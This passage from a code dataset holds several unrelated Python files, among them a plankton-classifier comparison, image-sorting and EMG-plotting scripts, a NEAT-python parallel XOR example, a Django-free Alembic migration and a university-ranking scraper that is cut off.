np.load('FUMSECK_L3/X_train610.npy')\ny_train = np.load('FUMSECK_L3/y_train610.npy')\n\nX_valid = np.load('FUMSECK_L3/X_valid610.npy')\ny_valid = np.load('FUMSECK_L3/y_valid610.npy')\n\nX_test = np.load('FUMSECK_L3/X_test610.npy')\ny_test = np.load('FUMSECK_L3/y_test610.npy')\n\n\nX_integrated = trapz(X_train, axis = 1)\nX_integrated = pd.DataFrame(X_integrated, columns = ['SWS','FWS', 'FL Orange', 'FL Red', 'Curvature'])\ny = y_train.argmax(1)\n \n# ENN for cleaning data\nenn = EditedNearestNeighbours()\nX_rs, y_rs = enn.fit_resample(X_integrated, y) \n\nX_train = X_train.take(enn.sample_indices_, axis = 0)\ny_train = y_train.take(enn.sample_indices_, axis = 0)\n\n# Rus to decrease sample size\nbalancing_dict = Counter(np.argmax(y_train,axis = 1))\nfor class_, obs_nb in balancing_dict.items():\n if obs_nb > 3000:\n balancing_dict[class_] = 3000\n\n\nrus = RandomUnderSampler(sampling_strategy = balancing_dict)\nids = np.arange(len(X_train)).reshape((-1, 1))\nids_rs, y_train = rus.fit_sample(ids, y_train)\nX_train = X_train[ids_rs.flatten()] \n\n# Integrate the curves\nX_train_i = trapz(X_train, axis = 1)\nX_valid_i = trapz(X_valid, axis = 1)\nX_test_i = trapz(X_test, axis = 1)\n\n\nknn_perfs = pd.DataFrame(columns = ['k', 'micro', 'macro', 'weighted'])\n\nk = 2\nfor k in range(1,10):\n print(k)\n knn = KNeighborsClassifier(n_neighbors = k)\n knn.fit(X_train_i, y_train)\n y_pred_valid = knn.predict(X_valid_i)\n knn_perfs = knn_perfs.append({'k': k, 'micro': precision_score(y_valid, y_pred_valid, average = 'micro'), \\\n 'macro': precision_score(y_valid, y_pred_valid, average='macro'), \n 'weighted': precision_score(y_valid, y_pred_valid, average='weighted')}, \n ignore_index = True)\n\nplt.plot(knn_perfs['k'], knn_perfs['micro'])\nplt.plot(knn_perfs['k'], knn_perfs['macro'])\nplt.plot(knn_perfs['k'], knn_perfs['weighted'])\n\n# k = 2 seems to be best choice ! (without ENN)\n\n\n###################################################################################################################\n# Evaluate ConvNet \n###################################################################################################################\n\nfrom keras.models import load_model\n\n# Performance of knn\n# Load pre-trained model\nLottyNet = load_model('C:/Users/rfuchs/Documents/cyto_classif/LottyNet_FUMSECK') \ny_pred_conv = LottyNet.predict(X_test)\n\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'micro')\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'macro')\nprecision_score(np.argmax(y_test, 1), np.argmax(y_pred_conv, 1), average = 'weighted')\n\n\n\n###################################################################################################################\n# Final word : Small win of ConvNet\n###################################################################################################################\n\n# Recap:\n# Without undersampling\n# 2-nn not us 2-nn rus 2-nn rus enn 2-nn enn Convnet\n# micro 0.884963 0.868984 0.844333 0.846938 0.937246\n# macro 0.532623 0.500137 0.491953 0.499227 0.500073\n# weighted 0.964046 0.954315 0.953897 0.955663 0.970292\n\n# Gagne sur micro : + 5 points de pourcentage, perd de 3 sur macro et gagne de 0,6 sur weighted\n# Certaine des petites classes sont un peu mieux représentées par knn sur L'ENSEMBLE DES DONNEES\n# Quand réduit la taille du jeu de données, NN est vraiment gagnant\n\n\n","repo_name":"RobeeF/planktonPipeline","sub_path":"extract_Pulse_values/knn_vs_Lottynet.py","file_name":"knn_vs_Lottynet.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11193112251","text":"import json\nimport os\nimport shutil\n\n# Define the paths\ndata_dir = '/home/rajat/Desktop/HateFul_Memes_Dataset/data'\njson_file = os.path.join(data_dir, 'train.jsonl')\nimage_dir = data_dir\n\n# Read the JSONL file\nwith open(json_file, 'r') as file:\n lines = file.readlines()\n\n# Process each line in the JSONL file\nfor line in lines:\n data = json.loads(line)\n label = data['label']\n image_filename = data['img']\n\n # Source and destination paths\n source_path = os.path.join(image_dir, image_filename)\n output_dir = os.path.join(data_dir, f'label_{label}')\n\n if os.path.isfile(source_path):\n os.makedirs(output_dir, exist_ok=True)\n destination_path = os.path.join(output_dir, image_filename)\n\n try:\n # Copy the image\n shutil.copy(source_path, destination_path)\n\n # Remove the original\n os.remove(source_path)\n\n except Exception as e:\n print(f\"Error occurred: {e}\")\n else:\n print(f\"File {source_path} does not exist. Skipping...\")\n\nprint(\"Images separated based on labels.\")\n","repo_name":"rajat397/Meme-Based-CyberBullying-Detection","sub_path":"scripts/splitting_facebook_dataset_script.py","file_name":"splitting_facebook_dataset_script.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42463495987","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 25 10:11:21 2019\r\n\r\n@author: Marina\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\nimport scipy.io\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport preprocessing_capgmyo \r\n\r\ndataDir = r'C:\\Users\\Marina\\Desktop\\CAPGMYO\\Capgmyo_dbc_preprocessed'\r\n\r\nX_data=[]\r\nY_data=[]\r\ne=0\r\nfor subject in range(1, 10):\r\n for g in range(1,13):\r\n# for d in range(len(dataDir)): \r\n for rep in range(1,11):\r\n file = dataDir+'/{:03d}-{:03d}-{:03d}.mat'.format(int(subject),int(g),int(rep))\r\n emg_data = scipy.io.loadmat(file)\r\n x_electrode_arr = np.zeros((1000,8))\r\n x = emg_data['data'].copy()\r\n x = preprocessing_capgmyo.lpf(x)\r\n# print(x[:,16:32].mean(axis=-1).shape)\r\n# for t in range(8):\r\n# x_electrode_arr[:][t:t] = np.mean(x[:,e:e+16],axis=-1)\r\n# e=e+16\r\n \r\n x_electrode_arr[:,0] = np.mean(x[:,0:15],axis=-1)\r\n x_electrode_arr[:,1] = np.mean(x[:,16:31],axis=-1)\r\n x_electrode_arr[:,2] = np.mean(x[:,32:47],axis=-1)\r\n x_electrode_arr[:,3] = np.mean(x[:,48:63],axis=-1)\r\n x_electrode_arr[:,4] = np.mean(x[:,64:79],axis=-1)\r\n x_electrode_arr[:,5] = np.mean(x[:,80:95],axis=-1)\r\n x_electrode_arr[:,6] = np.mean(x[:,96:111],axis=-1)\r\n x_electrode_arr[:,7] = np.mean(x[:,112:127],axis=-1)\r\n \r\n X_data.append(x_electrode_arr)\r\n \r\n Y_data.append(int(np.squeeze(emg_data['gesture'])))\r\n \r\n\r\n\r\n \r\n# 1. Use middle segment of signals to compute the mean\r\n \r\nX_segm = np.zeros((len(X_data), 340, 8))\r\nY_segm = np.zeros((len(Y_data),340,1))\r\nfor i in range(len(X_data)):\r\n m = len(X_data[i]) // 2\r\n X_segm[i,:,:] = X_data[i][m-170: m+170, :]\r\n\r\nplt.figure(figsize=(20,20))\r\n# 2. For every gesture compute and plot mean\r\n\r\n\r\n\r\nfor label in range(1,13):\r\n l=[]\r\n for k in range(len(Y_data)):\r\n if Y_data[k]==label:\r\n \r\n l.append(k) \r\n \r\n x_mean = [X_segm[j] for j in l] \r\n\r\n xm = np.mean(x_mean,axis=0)\r\n plt.subplot(4,3,label)\r\n plt.plot(xm)\r\n plt.title('gesture {}'.format(label))\r\nplt.legend(['electrode-{}'.format(i+1) for i in range(8)], bbox_to_anchor=(1.1, 1.05))\r\nplt.savefig('ground_truth_capgmyo.png')\r\nplt.show()\r\n\r\n\r\n\r\n ","repo_name":"DSIP-UPatras/sEMG-based-gesture-recognition-mgeorgoula","sub_path":"code/part_a/dbc_capgmyo/ground_truth_capgmyo.py","file_name":"ground_truth_capgmyo.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34320494694","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport subprocess\n\n\ndef getFileLocationThroughoutCurrentPath(fileName, currentPath='.'):\n previousDirectory = None\n currentDirectory = currentPath if currentPath != '.' else os.getcwd()\n while previousDirectory != currentDirectory:\n fileLocation = os.path.join(currentDirectory, fileName)\n if os.path.isfile(fileLocation):\n return fileLocation\n previousDirectory = currentDirectory\n currentDirectory = os.path.dirname(previousDirectory)\n return None\n\n\n# Entry-point\nif __name__ == \"__main__\":\n statTool = getFileLocationThroughoutCurrentPath('stat/stat_main.py')\n if statTool is None:\n print(\"fatal: STAT tool wasn't found\")\n sys.exit(-1)\n else:\n cmd = [sys.executable, \"-m\", \"cProfile\", statTool]\n cmd.extend(sys.argv[1:])\n try:\n process = subprocess.Popen(cmd, bufsize=1, universal_newlines=True,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n with open('_stat_profiling.txt', 'w') as fp:\n for line in iter(process.stdout.readline, ''):\n print(line, end='')\n fp.write(line)\n fp.flush()\n process.wait()\n sys.exit(process.returncode)\n except OSError as e:\n print(\"fatal: unable to start STAT\")\n print(\"fatal: %s\" % e)\n sys.exit(e.errno)\n","repo_name":"westerndigitalcorporation/stat","sub_path":"lib/tests/profilestat.py","file_name":"profilestat.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"29507226652","text":"#4\nmy_list = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА', 'токарь высшего разряда нИКОЛАй', 'директор аэлита']\nname_list = [] #создаём список только из имён сотрудников\nremoved_1 = my_list.pop(0) #извлекаем строку с именем сотрудника\nremoved_1 = removed_1.title() #пока у нас есть строка переделываем всем словам 1 букву в верхий регистр\nremoved_2 = my_list.pop(0)\nremoved_2 = removed_2.title()\nremoved_3 = my_list.pop(0)\nremoved_3 = removed_3.title()\nremoved_4 = my_list.pop(0)\nremoved_4 = removed_4.title()\n\n#print(my_list)\n#print(removed_1)\n#print(removed_2)\n#print(removed_3)\n#print(removed_4)\n\nfor i in removed_1:\n name_1 = (removed_1[removed_1.index(' '):]) #заносим в переменную имя сотрудника с помощью срезки относительно индекса пробела\nname_list.append(name_1) #помещаем имя сотрудника в список имён\n\nfor i in removed_2:\n name_2 = (removed_2[-removed_2.index(' '):])\nname_list.append(name_2)\n\nfor i in removed_3:\n name_3 = (removed_3[-removed_3.index(' '):]) #с именем Николай проблема - не понял как решить\nname_list.append(name_3)\n\nfor i in removed_4:\n name_4 = (removed_4[removed_4.index(' '):])\nname_list.append(name_4)\n\n#print(name_1)\n#print(name_2)\n#print(name_3)\n#print(name_4)\n#print(name_list)\n\nfor i in name_list:\n print(\"Привет, \" + i)","repo_name":"kazimiroff/repo-gui","sub_path":"Kazimirov_Dmitry_dz_2/DZ_2_task_4.py","file_name":"DZ_2_task_4.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26633063800","text":"from importlib import import_module as im\nfrom data_marketplace.utils.common import to_byte\nfrom data_marketplace.utils.log import logging\n\nlog = logging.getLogger('data_marketplace.crypto.hash')\n\ndef _hash(contents, hash_algo):\n log.info(\n \"Hashing the file.\\n\\\n Hash object: %s,\\n\\\n Hash function: %s\", id(contents), hash_algo)\n\n return _get_digest(contents, hash_algo)\n\ndef _validate(origin, target, hash_algo):\n digest = _get_digest(origin, hash_algo)\n calculated = digest.hexdigest()\n log.info('Calculated Hash: %s\\n'\n 'Target Hash: %s', calculated, target)\n if calculated == target:\n return True\n else:\n return False\n\ndef _get_digest(contents, hash_algo):\n module_name = hash_algo.upper() \n contents_byte = to_byte(contents)\n return im('Crypto.Hash.' + module_name).new(contents_byte)","repo_name":"grandq33769/gdpr-data-marketplace","sub_path":"data_marketplace/crypto/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13851475003","text":"\"\"\"Inicial\n\nRevision ID: 4f5c44e435a5\nRevises: 080cfa6e9650\nCreate Date: 2023-02-02 16:42:23.309875\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4f5c44e435a5'\ndown_revision = '080cfa6e9650'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('produto', sa.Column('tamanho', sa.String(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('produto', 'tamanho')\n # ### end Alembic commands ###\n","repo_name":"GuilhermeMPG/Backend_AppBLX","sub_path":"alembic/versions/4f5c44e435a5_inicial.py","file_name":"4f5c44e435a5_inicial.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13511800708","text":"import unittest\nimport os\nimport sys\n\nimport cv2 as cv\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),\n '..', '..')))\n\nfrom opencv_stitching.megapix_scaler import MegapixScaler\nfrom opencv_stitching.megapix_downscaler import MegapixDownscaler\n#%%\n\n\nclass TestScaler(unittest.TestCase):\n\n def setUp(self):\n self.img = cv.imread(\"s1.jpg\")\n self.size = (self.img.shape[1], self.img.shape[0])\n\n def test_get_scale_by_resolution(self):\n scaler = MegapixScaler(0.6)\n\n scale = scaler.get_scale_by_resolution(1_200_000)\n\n self.assertEqual(scale, 0.7071067811865476)\n\n def test_get_scale_by_image(self):\n scaler = MegapixScaler(0.6)\n\n scaler.set_scale_by_img_size(self.size)\n\n self.assertEqual(scaler.scale, 0.8294067854101966)\n\n def test_get_scaled_img_size(self):\n scaler = MegapixScaler(0.6)\n scaler.set_scale_by_img_size(self.size)\n\n size = scaler.get_scaled_img_size(self.size)\n self.assertEqual(size, (1033, 581))\n # 581*1033 = 600173 px = ~0.6 MP\n\n def test_force_of_downscaling(self):\n normal_scaler = MegapixScaler(2)\n downscaler = MegapixDownscaler(2)\n\n normal_scaler.set_scale_by_img_size(self.size)\n downscaler.set_scale_by_img_size(self.size)\n\n self.assertEqual(normal_scaler.scale, 1.5142826857233715)\n self.assertEqual(downscaler.scale, 1.0)\n\n\ndef starttest():\n unittest.main()\n\n\nif __name__ == \"__main__\":\n starttest()\n","repo_name":"alanross/AlvaAR","sub_path":"src/libs/opencv/apps/opencv_stitching_tool/opencv_stitching/test/test_megapix_scaler.py","file_name":"test_megapix_scaler.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"3"} +{"seq_id":"38869430023","text":"import telebot\nimport os\nimport openai\nimport json\n\nfrom functools import partial\n\n#TODO: read from env\nopenai.organization = os.getenv('BRAINSTORMER_OPENAI_ORG')\nopenai.api_key = os.getenv('BRAINSTORMER_OPENAI_KEY')\n\nBOT_TOKEN=os.getenv('BOT_TOKEN')\n\nCOMMANDS = { \n 'help' : 'Gives you information about the available commands',\n 'topic' : 'Set the ideas topic',\n 'debug' : 'Get the session debug info',\n 'yes' : 'Accept last suggested option',\n 'no' : 'Deny last suggested option'\n}\n\nIDEA_PROMPT = \"\"\"\nYou need the user to suggest an idea and then stop the conversation. You only speak JSON, do not write normal text. If you detect the user has an idea include it in the JSON response in the attribute \"idea\" and finish the conversation saying thanks.\n\"\"\"\n\nBRAINSTORMING_SESSION_PROMPT=\"\"\"\n# Brainstorming session\nThis document keeps track of possible ideas for a brainstorming session.\n\n## Ideas format\nThe ideas list is a well formed CSV document. Where the columns will be separated by the character `|` like:\ntitle | description\nFirst title | First description\nSecond title | Second description\n\nThe document will have a list of ideas and every idea will have the columns \"title\" with a name for the idea and \"description\" with the idea description.\n\n## Ideas for: {topic}\n\n{user_inputs_text}\n\n### Selected ideas\n{previous_text}\n\n{question_text}\ntitle | description\n\n\"\"\"\n\nDEBUG_TEMPLATE=\"\"\"\nTopic: {}\n\nCurrent list of pending ideas:\n{}\n\nCurrent list of bad ideas:\n{}\n\nCurrent list of good ideas:\n{}\"\"\"\n\nPREVIOUS_TEXT_TEMPLATE = \"\"\"\ntitle | description\n{}\n\"\"\"\n\nSUMMARY_PROMPT=\"\"\"\n# Ideas for: {topic}\n## Selected ideas\n{current_text}\n---\n## Pros and cons for every idea\n### {first_option}\nPros:\n- \"\"\"\n\nclass UserData:\n def __init__(self):\n self._user_data = {}\n\n def clear(self, id):\n self._user_data[id] = {\n 'topic': None,\n 'extra': [],\n 'good': [],\n 'bad': [],\n 'options': []\n } \n\n def add_topic(self, id, topic):\n self._user_data[id] = {\n 'topic': topic,\n 'extra': [],\n 'good': [],\n 'bad': [],\n 'options': []\n }\n\n def debug(self, id):\n user = self._user_data[id]\n return DEBUG_TEMPLATE.format(user['topic'], \"\\n\".join(user['options']), \"\\n\".join(user['bad']), \"\\n\".join(user['good'])) \n \n def current_option(self, id):\n return self._user_data.get(id)['options'][0]\n\n def get_user(self, id):\n return self._user_data.get(id)\n\n def get_topic(self, id):\n return self._user_data.get(id, {}).get('topic')\n\n def accept_current_option(self, id, extra_text=\"\"):\n user = self.get_user(id)\n if (user['options']):\n option = user['options'].pop(0)\n user['good'].append(option)\n if extra_text:\n user['extra'].append(extra_text)\n\n def deny_current_option(self, id):\n user = self.get_user(id)\n if (user['options']):\n option = user['options'].pop(0)\n user['bad'].append(option)\n\n def has_options(self, id):\n user = self.get_user(id)\n return len(user['options']) > 0\n\n def prompt(self, id):\n user = self.get_user(id)\n previous_list = \"\"\n\n previous_text = \"\"\n if user['good']:\n previous_list = \", \".join([\"\\\"{}\\\"\".format(p.split(\"|\")[0].strip()) for p in user['good']])\n previous_text = PREVIOUS_TEXT_TEMPLATE.format(\"\\n\".join(user['good']))\n\n user_inputs_text = \"\"\n if user['extra']:\n user_inputs_text = \",\".join(user['extra'])\n\n if previous_list:\n question_text = \"The next best 5 ideas that based combine ideas from {} are:\".format(previous_text)\n else:\n question_text = \"The next best 5 ideas are:\"\n\n prompt = BRAINSTORMING_SESSION_PROMPT.format(\n topic=user['topic'], \n user_inputs_text=user_inputs_text,\n previous_text=previous_text,\n question_text=question_text)\n\n print (\"prompt\", prompt)\n\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n presence_penalty=1,\n temperature=0.6,\n top_p=1,\n best_of=1,\n frequency_penalty=1,\n max_tokens=512,\n prompt=prompt)\n\n # user['options'] = completion.choices[0].text.split(\"\\n\")[1:]\n lines = completion.choices[0].text.split(\"\\n\")\n user['options'] = [a.strip() + \" | \" + b.strip() for a, b in [line.split(\"|\") for line in lines if line.strip()]]\n return user['options']\n\nuser_data = UserData()\nbot = telebot.TeleBot(BOT_TOKEN)\n\n@bot.message_handler(commands=['help'])\ndef help(message):\n user_id = message.chat.id\n help_text = \"The following commands are available: \\n\"\n for key in COMMANDS: # generate help text out of the commands dictionary defined at the top\n help_text += \"/\" + key + \": \"\n help_text += COMMANDS[key] + \"\\n\"\n bot.send_message(user_id, help_text) # send the generated help page\n\n\ndef suggest_next_option(user_id, prompt=False):\n if not user_data.has_options(user_id) or prompt:\n user_data.prompt(user_id)\n \n option = user_data.current_option(user_id)\n bot.send_message(user_id, option + \" (/yes /no)\")\n\n@bot.message_handler(commands=['restart'])\ndef restart(message): \n user_id = message.chat.id\n user_data.clear(user_id)\n\n\n@bot.message_handler(commands=['topic'])\ndef set_topic(message): \n user_id = message.chat.id\n user_data.add_topic(user_id, message.text.replace(\"/topic\", \"\").strip())\n suggest_next_option(user_id)\n\n\n@bot.message_handler(commands=['finish'])\ndef set_topic(message): \n user_id = message.chat.id\n user = user_data.get_user(user_id)\n topic = user_data.get_topic(user_id)\n current_text = \"\"\n first_option = \"\"\n if user['good']:\n current_text = user['good'][-1]\n first_option = user['good'][-1].split(\"|\")[0]\n\n prompt = SUMMARY_PROMPT.format(topic=topic, first_option=first_option, current_text=current_text)\n\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n presence_penalty=2,\n temperature=0.5,\n top_p=1,\n best_of=1,\n frequency_penalty=0,\n max_tokens=512,\n prompt=prompt)\n\n prompt = prompt + completion.choices[0].text + \"\\n## Summary\\n\"\n\n completion = openai.Completion.create(\n model=\"text-davinci-003\",\n presence_penalty=1,\n temperature=0.1,\n top_p=1,\n best_of=1,\n frequency_penalty=0.2,\n max_tokens=512,\n prompt=prompt)\n\n result = prompt + completion.choices[0].text\n bot.send_message(user_id, result.split(\"---\")[1].strip()) \n user_data.clear(user_id)\n \n\ndef process_option(option, options, message):\n user_id = message.chat.id\n response = message.text\n if message.text == 'yes':\n user_data.add_good(user_id, option)\n else:\n user_data.add_bad(user_id, option)\n\n if not options:\n options = user_data.prompt(user_id)\n\n option = options.pop(0)\n bot.send_message(message.chat.id, option)\n bot.register_next_step_handler(message, partial(process_option, option, options))\n\n@bot.message_handler(commands=['yes'])\ndef accept_option(message): \n user_id = message.chat.id\n user_data.accept_current_option(user_id, message.text.replace(\"/yes\", \"\"))\n suggest_next_option(user_id, True)\n print(user_data.get_user(user_id))\n\n\n@bot.message_handler(commands=['no'])\ndef deny_option(message): \n user_id = message.chat.id\n user_data.deny_current_option(user_id)\n suggest_next_option(user_id)\n\n\n@bot.message_handler(commands=['debug'])\ndef debug(message): \n\tuser_id = message.chat.id\n\tbot.reply_to(message, user_data.debug(user_id))\n\n\n#Handle all other messages\n@bot.message_handler(func=lambda m: True)\ndef general_messages(message):\n # bot.send_message(message.chat.id, \"Unknown command\")\n # help(message)\n user_id = message.chat.id\n topic = user_data.get_topic(user_id)\n\n if not topic:\n messages = [\n {\"role\": \"assistant\", \"content\": IDEA_PROMPT},\n {\"role\": \"user\", \"content\": message.text}\n ]\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=messages,\n temperature=0.1\n )\n\n content = response[\"choices\"][0][\"message\"].content\n\n print(content)\n\n try:\n content = json.loads(content)\n if content.get(\"idea\"):\n user_data.add_topic(user_id, content.get(\"idea\"))\n suggest_next_option(user_id)\n elif not content.get(\"end_conversation\"):\n bot.send_message(user_id, content.get(\"message\"))\n else:\n user_data.add_topic(user_id, message.text)\n suggest_next_option(user_id)\n\n except ValueError as err:\n bot.send_message(user_id, content)\n\n else:\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=\"\"\"\nClassify the following text as: \n- \"affirmative\": if the user is saying yes, ok, or something similar\n- \"negative\": if the user is saying no, or something similar\n- \"idea\": if the users is suggesting to speak about a new topic or is interested on it. Include an attribute idea with the topic.\n- \"unknown\": if you don't understand what the user says\n\nThe output must be a valid json including a message explaining to the user what you understood and why you made that decision.\n\nAn output example:\n```\n{{\n \"classification\": \"affirmative\",\n \"message\": \"I understood that you said 'sure', which is an affirmative answer.\"\n}}\n```\n\nText: \"{}\"\n\"\"\".format(message.text),\n temperature=0.1,\n max_tokens=256,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n\n content = response[\"choices\"][0][\"text\"]\n\n print(\"content\", content)\n\n try:\n content = json.loads(content)\n classification = content.get(\"classification\")\n print(\"classification\", classification)\n if classification == \"affirmative\" or content.get(\"affirmative\"):\n accept_option(message)\n elif classification == \"negative\" or content.get(\"nevagite\"):\n deny_option(message)\n elif classification == \"idea\":\n user_data.add_topic(user_id, message.text)\n bot.send_message(user_id, content.get(\"message\"))\n suggest_next_option(user_id) \n else:\n bot.send_message(user_id, content.get(\"message\"))\n\n except ValueError as err:\n bot.send_message(user_id, content)\n\nbot.polling()","repo_name":"PIWEEK/brainstormer","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69899822802","text":"#!/usr/lib/anaconda3/bin/python\n#!C:\\staging\\python\\systems\\Scripts\\python.exe\n# -*- coding: utf-8 -*-\n\"\"\" codec.py\n\nChallenges: https://www.lintcode.com/problem/encode-and-decode-strings/description\nSolutions:\nDescription:\nAttributes:\n __version__ = \"1.0.0\"\n __project__ = pilot\n __author__ = Jeremy Sung\n __date__ = 8/23/2018 3:04 PM\n __Email__ = Jeremy.Sung@osh.com\n\n\"\"\"\n\n\nclass codec:\n\n def encode(self, strs):\n \"\"\"\n @param: strs: a list of strings\n @return: encodes a list of strings to a single string.\n \"\"\"\n return \" \".join(strs)\n\n def decode(self, str):\n \"\"\"\n @param: str: A string\n @return: dcodes a single string to a list of strings\n \"\"\"\n return str.split()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n codec = codec()\n\n strs = [\"lint\",\"code\",\"love\",\"you\"] ## string encoded_string = encode(strs)\n encoded_string = codec.encode(strs)\n\n print(codec.decode(encoded_string)) ## return [\"lint\",\"code\",\"love\",\"you\"] when you call decode(encoded_string)\n\n\n\n","repo_name":"Jeremy-Sung-Dev/staging","sub_path":"python/libs_dev/codec.py","file_name":"codec.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"13536422360","text":"#!/usr/bin/python3\n\n\"\"\"\nmodule for island_perimeter\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"\n returns the perimeter of the island described in grid\n \"\"\"\n perimeter = 0\n\n rows = len(grid)\n cols = len(grid[0])\n\n for row in range(rows):\n for col in range(cols):\n grid_cell = grid[row][col]\n if grid_cell is 1:\n perimeter += 4\n if row != 0 and grid[row - 1][col] is 1:\n perimeter -= 1\n if col != 0 and grid[row][col - 1] is 1:\n perimeter -= 1\n if row + 1 != rows and grid[row + 1][col] is 1:\n perimeter -= 1\n if col + 1 != cols and grid[row][col + 1] is 1:\n perimeter -= 1\n\n return perimeter\n","repo_name":"bmn44100/alx-interview","sub_path":"0x09-island_perimeter/0-island_perimeter.py","file_name":"0-island_perimeter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25175613891","text":"\"\"\"\nA parallel version of XOR using neat.parallel.\n\nSince XOR is a simple experiment, a parallel version probably won't run any\nfaster than the single-process version, due to the overhead of\ninter-process communication.\n\nIf your evaluation function is what's taking up most of your processing time\n(and you should check by using a profiler while running single-process),\nyou should see a significant performance improvement by evaluating in parallel.\n\nThis example is only intended to show how to do a parallel experiment\nin neat-python. You can of course roll your own parallelism mechanism\nor inherit from ParallelEvaluator if you need to do something more complicated.\n\"\"\"\n\nimport multiprocessing\nimport os\n\nimport neat\nimport visualize\n\n# 2-input XOR inputs and expected outputs.\nxor_inputs = [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (1.0, 1.0)]\nxor_outputs = [(0.0,), (1.0,), (1.0,), (0.0,)]\n\n\ndef eval_genome(genome, config):\n \"\"\"\n This function will be run in parallel by ParallelEvaluator. It takes two\n arguments (a single genome and the genome class configuration data) and\n should return one float (that genome's fitness).\n\n Note that this function needs to be in module scope for multiprocessing.Pool\n (which is what ParallelEvaluator uses) to find it. Because of this, make\n sure you check for __main__ before executing any code (as we do here in the\n last few lines in the file), otherwise you'll have made a fork bomb\n instead of a neuroevolution demo. :)\n \"\"\"\n\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n error = 4.0\n for xi, xo in zip(xor_inputs, xor_outputs):\n output = net.activate(xi)\n error -= (output[0] - xo[0]) ** 2\n return error\n\n\ndef run(config_file):\n # Load configuration.\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n\n # Run for up to 300 generations.\n pe = neat.ParallelEvaluator(multiprocessing.cpu_count(), eval_genome)\n winner = p.run(pe.evaluate, 300)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n print('\\nOutput:')\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n for xi, xo in zip(xor_inputs, xor_outputs):\n output = winner_net.activate(xi)\n print(\"input {!r}, expected output {!r}, got {!r}\".format(xi, xo, output))\n\n node_names = {-1: 'A', -2: 'B', 0: 'A XOR B'}\n visualize.draw_net(config, winner, True, node_names=node_names)\n visualize.draw_net(config, winner, True, node_names=node_names, prune_unused=True)\n visualize.plot_stats(stats, ylog=False, view=True)\n visualize.plot_species(stats, view=True)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config-feedforward')\n run(config_path)\n","repo_name":"CodeReclaimers/neat-python","sub_path":"examples/xor/evolve-feedforward-parallel.py","file_name":"evolve-feedforward-parallel.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":1290,"dataset":"github-code","pt":"3"} +{"seq_id":"25022934784","text":"# -*- coding = utf-8 -*-\n\nimport requests\nimport bs4\n# import openpyxl\n# from bs4 import BeautifulSoup\n\n# 2020中国大学排名\ndef getHTMLText(url):\n try:\n r = requests.get(url,timeout = 10)\n r.encoding = r.apparent_encoding\n r.raise_for_status()\n demo = r.text\n soup = bs4.BeautifulSoup(demo, 'lxml')\n return soup\n except:\n print('获取异常')\n\ndef fillUnivlist(soup):\n ulist = []\n for tr in soup.find('tbody').children:\n if isinstance(tr,bs4.element.Tag):\n tds = 